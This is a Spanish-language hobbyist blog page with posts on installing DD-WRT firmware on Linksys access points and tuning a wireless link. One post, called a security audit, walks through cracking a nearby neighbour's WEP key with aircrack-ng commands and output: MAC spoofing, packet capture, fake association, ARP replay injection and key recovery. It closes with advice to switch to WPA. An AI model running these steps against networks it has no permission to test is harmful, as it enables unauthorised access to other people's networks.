Todo lo relacionado con conexiones inalámbricas, dispositivos, antenas, etc.
Llevaba 3 días con un enlace de 5.3 km. totalemente inestable, excelente por las mañanas pero al primer intercambio de datos aterrizaba el Chanate radioactivo en la antena y PUUUM , se caía el enlace.
Moví, ajusté, maldije, volví a mover, devolví el dispositivo a sus valores de fábrica por accidente (no sin antes perder un poco de cabello del susto), volví a maldecir, hasta que por fin se me ocurrió preguntarle a Mirim (el que me inicio en esto del dd-wrt) y me dijó que aumentara el valor de TX Power en Wireless – Advanced Settings.
Anteriormente me había advertido de que no aumentara mucho ese valor, pero al parecer las condiciones meteorológicas que actualmente predominan en la región esta afectando el enlace y tiene cierta lógica, la Comarca Lagunera es un lugar seco y últimamente ha estado nublado y ha caído granizo en un par de ocasiones.
El valor mágico fue 180, más del doble que su valor inicial que era de 70, pero el enlace se esta portando como en sus mejores días, nada más voy a esperar a que estas condiciones pasen y lo voy a bajar poco a poco a su valor inicial.
¡Gracias Mirim!
Popularity: 2%
Después de pasarme dos días experimentando, al fin tengo un resultado más o menos estable con dd-wrt y los linksys WAP54G.
Instalé el firmware dd-wrt.v24-9344_NEWD_micro.bin que fue el que recomendaron en los foros para un WAP54G v3.1 aunque también lo instalé en otro versión 2.0
Hasta ahorita he logrado mantener un buen enlace de 5 km, con estos aparatos, todavía no estoy seguro porque fue que dejaron de funcionar los anteriores con el firmware original.
Tengo la sospecha de que era por la saturación de canales en el área. Cuando instalé los dispositivos hace ya casi dos años el territorio estaba prácticamente virgen, ahora que hice una pequeña exploración del área, gracias a la opción Site Survey me di cuenta de que el lugar estaba bastante saturado, me llegué a topar con hoteles, universidades y una buena cantidad de infinitums ofreciendo a diestra y siniestra sus señales.
Cuando menos 3 puntos de acceso ofrecían sus servicios en el mismo canal que el mío y no se porque extraña razón el canal 11 era el único que funcionaba medianamente bien.
Aprovechando que el nuevo firmware ofrece 3 canales más decidí probarlos (normalmente son del 1 al 11, dd-wrt llegá hasta el 14), Lo que les puedo decir es que se logran muy buenas velocidades en el canal 14 como se puede ver en la gráfica.
Quiero agradecer la ayuda proporcionada por El Fantasma, aunque por un error de comunicación y casi al final de la charla me di cuenta de que todos sus consejos estaban enfocados a los WRT54G (que tienen un router incorporado) y que no eran al 100% aplicables con los WAP54G que solamente tienen un puerto Ethernet.
También noté que el valor TX Power se estableció por default a 70 ( cuando de fabrica tienen un valor de 28).
Recordé que mirim me había recomendado que no pasara de 80 porque podría quemar el aparato así que mejor le puse un valor más conservador de 50, aunque de todos modos no estoy muy tranquilo que digamos.
En general es muuuy bueno este firmware, solo una recomendación que probablemente les puede ahorrar muchos dolores de cabeza, cada vez que hagan un cambio, primero guárdenlo y luego aplíquenlo. Se ahorrarán una buena cantidad de tiempo, se los aseguró 
Popularity: 2%
Estoy por cambiarle el firmware a un WAP54G, pero antes de hacerlo quisiera escuchar sugerencias…
¿Que firmware alternativo me recomiendan?.
Actualización 28-Mar-2008
Por aclamación popular el elegido fue DD-WRT.
Siguiendo las instrucciones del wiki, descargue la versión Use V24-RC5 (dicen que la versión RC6 tiene problemas con este dispositivo).
Al seguir las instrucciones, me llevé el susto de mi vida ya que me dio un error al hacer el firmware upgrade
Pero gracias a la recomendación de El Fantasma ya tenía a la mano el cliente gráfico del tftp para subir el firmware que ahora si ocurrió sin problemas.
Popularity: 1%
Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.
Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.
Material necesario.
Los pasos a seguir.
Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quisé escribir eso ).
Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse 
)
1.- Verificar si se reconoció la tarjeta de red inalámbrica.
iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
Warning: Driver for device wlan0 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
wlan0 802.11b/g Mode:Monitor Channel=1 Bit Rate=11 Mb/s Tx-Power=11 dBm Retry:on Fragment thr:off Link Quality=84/100 Signal level=-236 dBm Noise level=-240 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo pude andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.
2.- Cambio de la mac address.
macchanger -m 00:11:22:33:44:56 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc) Faked MAC: 00:11:22:33:44:56 (Cimsys Inc)
Este paso lo realizo para no tener que acordarme de mi Mac Addres 
3.- Búsqueda de las redes inalámbricas en los alrededores.
airodump-ng wlan0
CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:00:00:00:00:01 2 4 0 0 6 22. WEP WEP 2WIRE000 11:11:11:11:11:11 15 53 0 0 1 54. WEP WEP INFINITUM0000 00:00:00:00:00:02 5 34 0 0 6 54. OPN linksys
En estos resultados vamos a tomar nota de varios datos importantes.
Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.
De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.
4.- Iniciar la captura.
airodump-ng -w captura -c 1 wlan0
captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.
Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.
5.- Asociar la red inalámbrica.
aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
11:26:36 Waiting for beacon frame (BSSID: 11:11:11:11:11:11) 11:26:36 Sending Authentication Request 11:26:36 Authentication successful 11:26:36 Sending Association Request 11:26:36 Association successful
Sí aparece el mensaje de Association successful estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.
6.- Iniciar la captura de paquetes.
aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
Saving ARP requests in replay_arp-0316-112829.cap You should also start airodump-ng to capture replies. Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)
En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.
7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.
Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.
aircrack-ptw captura-02.cap
This is aircrack-ptw 1.0.0 For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ allocating a new table bssid = 11:11:11:11:11:11 keyindex=0 stats for bssid 11:11:11:11:11:11 keyindex=0 packets=159646 Found key with len 05: 01 23 34 56 78
Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.
Conclusiones.
Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fabrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.
Popularity: 9%
Hoy en la mañana me pasó algo curioso en el trabajo, recibí una llamada de soporte en la que una computadora no tenía conexión inalámbrica a la red.
Revisé lo usual y curiosamente la computadora sí se conectaba pero no podía negociar su dirección IP mediante el servidor DCHP del dispositivo.
Aplique la primera ley de windows al aparatito, o sea lo reinicié y nada… siguió en las mismas.
El pequeño router es un WRT54G de la marca Linksys y hace tiempo que tenía la tentación de cambiarle el firmware por un DD-WRT.
Pero por varias razones no me había atrevido, porque no entendía bien las instrucciones, por el miedo a echarlo a perder y terminar con un pisapapeles demasiado caro, bueno el chiste es que hice a un lado todo eso y me aplique a buscar la información necesaria para hacerlo.
Encontré los pasos a seguir, espeficicamente en la sección que dice For the WRT54G v5, v5.1, and v6 ONLY, ya que el mio es una versión 6.
Después de seguir los pasos y en un redoble de tambores apareció la siguiente pantalla.
TATAAAAAAAAAN !!!, lo demás fue configurarlo de igual manera que como estaba anteriormente para que el cambio fuera transparente a mis usuarios pero fue algo muy sencillo, ahora veo que me aparecen más opciones, con calma voy a ver que más se puede hacer con este firmware.
Popularity: 1%
El blog de un lagunero de nacimiento y jerezano de corazón.
Este blog trata de todo aquello que ha llamado alguna vez mi atención incluyendo claro Linux y el software libre.
Inicio